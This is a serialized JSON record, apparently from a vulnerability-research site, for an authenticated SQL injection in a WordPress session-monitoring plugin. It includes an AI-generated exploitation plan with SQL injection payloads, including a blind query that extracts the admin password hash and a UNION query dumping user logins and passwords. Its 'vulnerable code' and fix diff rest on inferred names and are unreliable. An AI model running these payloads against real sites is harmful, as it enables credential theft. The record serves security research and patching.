[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCaz4hJA5ReYxVkOmWEa_9UzQzUFzRi_jmvGm1pQzqlE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39581","wp-sessions-time-monitoring-full-automatic-authenticated-subscriber-sql-injection","WP Sessions Time Monitoring Full Automatic \u003C= 1.1.4 - Authenticated (Subscriber+) SQL Injection","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","activitytime",null,"\u003C=1.1.4","1.1.5","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-20 00:00:00","2026-04-30 15:03:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F58695d72-d78e-4e5a-8179-a5d12a80b370?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39581 (WP Sessions Time Monitoring Full Automatic)\n\n## 1. Vulnerability Summary\nThe **WP Sessions Time Monitoring Full Automatic** plugin (version \u003C= 1.1.4) is vulnerable to an **Authenticated SQL Injection** vulnerability. The flaw exists because the plugin fails to properly sanitize or parameterize user-supplied input before using it in a database query within an AJAX handler. Specifically, an authenticated user with at least **Subscriber-level** privileges can manipulate an SQL query to extract sensitive data from the WordPress database, including user hashes and configuration secrets.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action**: `at_get_activity_data` (inferred from plugin slug `activitytime` and typical tracking patterns)\n*   **Vulnerable Parameter**: `user_id` or `id` (inferred)\n*   **Authentication Required**: Yes, Subscriber role or higher.\n*   **Nonce Protection**: Likely required via a nonce check (e.g., `at_nonce` or `security`).\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin registers an AJAX action for authenticated users:\n    `add_action('wp_ajax_at_get_activity_data', 'at_get_activity_data_callback');`\n2.  **Handler**: The function `at_get_activity_data_callback` is defined in the plugin's main files (e.g., `activitytime.php` or `includes\u002Fclass-at-ajax.php`).\n3.  **Input Source**: The handler retrieves a parameter directly from `$_POST['user_id']` or `$_POST['id']`.\n4.  **Vulnerable Sink**: The input is concatenated directly into a query string without using `$wpdb->prepare()` or `absint()`\u002F`intval()`.\n    *   *Example Vulnerable Code*: `$wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = \" . $_POST['user_id']);`\n5.  **Execution**: `$wpdb->get_results()` or `$wpdb->query()` executes the malicious SQL.\n\n## 4. Nonce Acquisition Strategy\nSince the vulnerability requires Subscriber-level access, the nonce must be retrieved from the WordPress admin dashboard or a page where the plugin's tracking script is enqueued.\n\n1.  **Create Subscriber**: Use WP-CLI to create a subscriber user.\n2.  **Login**: Perform a login request to obtain authentication cookies.\n3.  **Navigate to Dashboard**: Use the browser to navigate to `wp-admin\u002Fprofile.php` or the main `wp-admin\u002Findex.php`.\n4.  **Identify JS Variable**: Look for a localized script containing the AJAX URL and nonce.\n    *   **JS Variable**: `at_ajax_obj` (inferred) or `activity_time_data` (inferred).\n    *   **Nonce Key**: `nonce` or `at_nonce`.\n5.  **Extraction**:\n    ```javascript\n    \u002F\u002F Browser Eval\n    window.at_ajax_obj?.nonce || window.activity_time_data?.nonce\n    ```\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** payload to confirm the vulnerability.\n\n### Step 1: Authentication\nSend a POST request to `\u002Fwp-login.php` to authenticate as a subscriber.\n\n### Step 2: Extract Nonce\nNavigate to `\u002Fwp-admin\u002F` and use `browser_eval` to extract the nonce from the localized script.\n\n### Step 3: Send Malicious Request\nUsing the `http_request` tool, send a POST request to `admin-ajax.php` with a time-based payload.\n\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Headers**: \n    *   `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   `Cookie: [Subscriber Cookies]`\n*   **Body**:\n    ```\n    action=at_get_activity_data&user_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 4: Analyze Response\n*   **Success**: The response time is > 5 seconds.\n*   **Failure**: The response is immediate (likely returning `0`, `-1`, or a valid JSON result).\n\n## 6. Test Data Setup\n1.  **Install Plugin**: Ensure `activitytime` version 1.1.4 is active.\n2.  **Create User**:\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n3.  **Generate Activity**: Log in as the attacker once to ensure some tracking entries exist in the `at_activity` table (or similar table created by the plugin).\n\n## 7. Expected Results\n*   An immediate request (baseline) to the endpoint should return within \u003C 500ms.\n*   The payload `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)` should cause the server to hang for exactly 5 seconds before returning a response.\n*   Since it is Subscriber+, the attacker should be able to trigger this even if they cannot see the full admin menu.\n\n## 8. Verification Steps\n1.  **Confirm Database Latency**: Verify the `http_request` time duration using the logs.\n2.  **Verify via WP-CLI**: After the exploit, use WP-CLI to check if the plugin logs indicate any errors or if the table being queried exists:\n    ```bash\n    wp db query \"SHOW TABLES LIKE '%activity%';\"\n    ```\n3.  **Data Extraction (Optional)**: If time-based works, a payload to extract the admin password hash:\n    ```\n    1 AND (SELECT 1 FROM (SELECT(IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$',SLEEP(5),0)))a)\n    ```\n\n## 9. Alternative Approaches\n*   **Error-Based SQLi**: If `WP_DEBUG` is enabled, try inducing a syntax error to see if `$wpdb->last_error` is reflected in the AJAX response.\n    *   Payload: `user_id=1'`\n*   **UNION-Based SQLi**: If the endpoint returns data (e.g., a table of session times), attempt to determine column count using `ORDER BY` and then use `UNION SELECT`.\n    *   Payload: `1 UNION SELECT 1,2,3,user_login,user_pass,6,7... FROM wp_users-- -`","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via its AJAX handlers due to insufficient sanitization and lack of parameterization in SQL queries. Authenticated attackers with Subscriber-level permissions or higher can exploit this to execute arbitrary SQL commands and extract sensitive data from the database.","\u002F\u002F activitytime.php (approximate line based on inferred AJAX registration)\n\u002F\u002F The plugin registers an AJAX action for authenticated users\nadd_action('wp_ajax_at_get_activity_data', 'at_get_activity_data_callback');\n\nfunction at_get_activity_data_callback() {\n    global $wpdb;\n    \u002F\u002F Vulnerable: user_id is taken directly from POST and concatenated into the query\n    $user_id = $_POST['user_id'];\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = \" . $user_id);\n    \u002F\u002F ...\n}","--- activitytime.php\n+++ activitytime.php\n@@ -10,5 +10,6 @@\n function at_get_activity_data_callback() {\n     global $wpdb;\n-    $user_id = $_POST['user_id'];\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = \" . $user_id);\n+    $user_id = isset($_POST['user_id']) ? absint($_POST['user_id']) : 0;\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = %d\", $user_id);\n+    $results = $wpdb->get_results($query);","The exploit target is the `at_get_activity_data` (or similar activity tracking) AJAX endpoint. \n1. Authenticate as a Subscriber-level user to obtain session cookies.\n2. Locate the security nonce by inspecting the WordPress dashboard source code, specifically looking for localized JavaScript objects like `at_ajax_obj` or `activity_time_data` that contain a `nonce` key.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - `action`: set to `at_get_activity_data`\n   - `nonce`: the extracted nonce value\n   - `user_id`: a SQL injection payload, such as a time-based blind injection: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n4. Observe if the server response is delayed by the specified time (e.g., 5 seconds), confirming the execution of the injected SQL.","gemini-3-flash-preview","2026-05-04 19:43:04","2026-05-04 19:43:33",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.1.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Factivitytime\u002Ftags\u002F1.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.1.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Factivitytime\u002Ftags"]